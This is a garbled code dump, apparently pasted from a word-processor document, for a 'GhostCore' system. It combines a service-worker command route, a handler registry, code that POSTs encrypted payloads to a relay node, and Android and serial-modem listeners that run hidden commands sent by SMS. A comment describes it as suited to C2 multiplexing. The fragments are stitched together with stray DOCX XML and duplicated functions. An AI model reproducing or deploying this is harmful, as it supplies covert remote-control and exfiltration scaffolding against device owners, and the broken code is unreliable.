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commandHandlers.js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caches.open('ghost-core-cache').then(cache =&gt;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cache.put(`/drift/${Date.now()}`, new Response(encryptedPayload));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export async function handleCommand(commandType, params)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switch (commandType)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case 'ECHO_MEMORY':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return await echoMemory(params);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case 'UPLOAD_NULL_PAYLOAD':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return await uploadNullPayload(params);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case 'REDIRECT_PAYLOAD':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return await redirectPayload(params);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return { error: `Unknown command type: ${commandType}` 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let relayNode = selectUplinkNode(payloadMeta);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let fetchUrl = `https://${relayNode}/inbound`;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fetch(fetchUrl,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method: 'POST',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body: encryptedPayload,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headers: {'Content-Type': 'application/octet-stream'}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Custom Command Implementations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async function echoMemory({ message })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// Simulate returning a reflected payload for echo validation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return { echo: message, timestamp: Date.now() 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case 42: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// Initiate memory recall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return customMemoryRecall(payload, userContext);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case 77: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// Offload quantum key material to internal ghost ring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return uploadToNullDrive(encryptedPayload);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async function uploadNullPayload({ targetPath })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// Simulate a null payload injection to target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// This could be modified to write to filesystem or memory maps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return { status: 'NULL_PAYLOAD_SENT', target: targetPath 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async function redirectPayload({ payload, destinations })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// Route encrypted payload to different handlers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// Useful for C2 multiplexing or honeypot splitting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return destinations.map(dest =&gt; ({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destination: dest,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forwardedPayload: payload, // Still encrypted, assumes endpoint will decrypt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status: 'FORWARDED'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Extendable exports for integration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export const commandRegistry =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'ECHO_MEMORY': echoMemory,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'UPLOAD_NULL_PAYLOAD': uploadNullPayload,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'REDIRECT_PAYLOAD': redirectPayload,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'RECALL_MEMORY': customMemoryRecall,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'NULL_DRIVE_UPLOAD': uploadToNullDrive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export async function handleCommand(commandType, params)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const handler = commandRegistry[commandType];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if (!handler)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{ error: `Unknown command type: ${commandType}` };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return await handler(params);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function workboxExtensions(workbox, options)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workbox.routing.registerRoute(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/\/ghost-core\/command/,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async ({ request }) =&gt;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const body = await request.clone().json();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const { commandType, params } = body;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const { handleCommand } = await import('/core/commandHandlers.js');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const result = await handleCommand(commandType, params);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return new Response(JSON.stringify(result),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headers: { 'Content-Type': 'application/json'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'POST'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function cachingExtensions(workbox, options)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// Drift-Aware Prefetch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self.addEventListener('message', event =&gt;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 (event.data &amp;&amp; event.data.type === 'DRIFT_PREFETCH')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caches.open(options.cacheOptions.cacheId).then(cache =&gt;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event.data.urls.forEach(url =&gt;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fetch(url).then(response =&gt; cache.put(url, response));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/////Usage Case///////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{ handleCommand } from './commandHandlers.js';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const result = await handleCommand(commandType, params);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result now holds processed logic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smsListenerDaemon.js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{ handleCommand } from './commandHandlers.js';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const GHOST_PREFIX = "⧖"; // Marks drift-encoded commands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export function startSMSListener()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console.log("[GhostCore] SMS Listener Initialized...");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// Simulated hook for incoming SMS (replace with native call in real deployment)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globalThis.onIncomingSMS = async (smsBody, sender) =&gt;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if (!smsBody.startsWith(GHOST_PREFIX)) return;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const parsed = parseGhostSMS(smsBody);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console.log(`[GhostCore] Parsed Command from ${sender}:`, parsed);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const result = await handleCommand(parsed.commandType, parsed.params);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console.log("[GhostCore] Command Executed:", result);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return result;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 catch (err)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console.error("[GhostCore] Failed to process SMS command:", err.message);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function parseGhostSMS(sms)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  // ⧖42|{"param":"value"}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const stripped = sms.replace(GHOST_PREFIX, '');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const [commandCode, paramBlock] = stripped.split("|");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const commandType = isNaN(commandCode) ? commandCode : parseInt(commandCode);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const params = JSON.parse(paramBlock);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return { commandType, params };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 After parseGhostSMS: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if (!validateSignature(params, knownDriftKey)) throw new Error("Invalid Signature");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br w:type="textWrapping"/>
        <w:t xml:space="preserve">public class SMSReceiver extends BroadcastReceiver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public void onReceive(Context context, Intent intent)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Bundle bundle = intent.getExtras();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SmsMessage[] msgs = null;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if (bundle != null)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Object[] pdus = (Object[]) bundle.get("pdus");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msgs = new SmsMessage[pdus.length];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for (int i = 0; i &lt; msgs.length; i++)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msgs[i] = SmsMessage.createFromPdu((byte[]) pdus[i]);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String body = msgs[i].getMessageBody();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String sender = msgs[i].getOriginatingAddress();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                if (body.startsWith("⧖"))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Intent serviceIntent = new Intent(context, GhostCoreService.class);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serviceIntent.putExtra("commandSMS", body);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serviceIntent.putExtra("sender", sender);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context.startService(serviceIntent);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&lt;receiver android:name=".SMSReceiver"&gt;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&lt;intent-filter&gt;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&lt;action android:name="android.provider.Telephony.SMS_RECEIVED"/&gt;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&lt;/intent-filter&gt;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&lt;/receiver&gt;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public class GhostCoreService extends IntentService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public GhostCoreService()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super("GhostCoreService");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protected void onHandleIntent(Intent intent)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String command = intent.getStringExtra("commandSMS");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String sender = intent.getStringExtra("sender");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// TODO: Parse and dispatch to internal handler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GhostCoreDispatcher.handle(command, sender);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br w:type="textWrapping"/>
        <w:t xml:space="preserve">////////</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Node.Js///////</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">import SerialPort from 'serialport';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import Readline from '@serialport/parser-readline';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const port = new SerialPort('/dev/ttyUSB0', { baudRate: 9600 });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const parser = port.pipe(new Readline({ delimiter: '\r\n' }));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parser.on('data', (line) =&gt;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if (line.startsWith('+CMT:'))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currentSender = line.split(',')[0].split('"')[1];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  } else if (line.startsWith('⧖'))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console.log(`GhostCore SMS from ${currentSender}:`, line);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// Dispatch to your GhostCore command handler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handleIncomingSMS(line, currentSender);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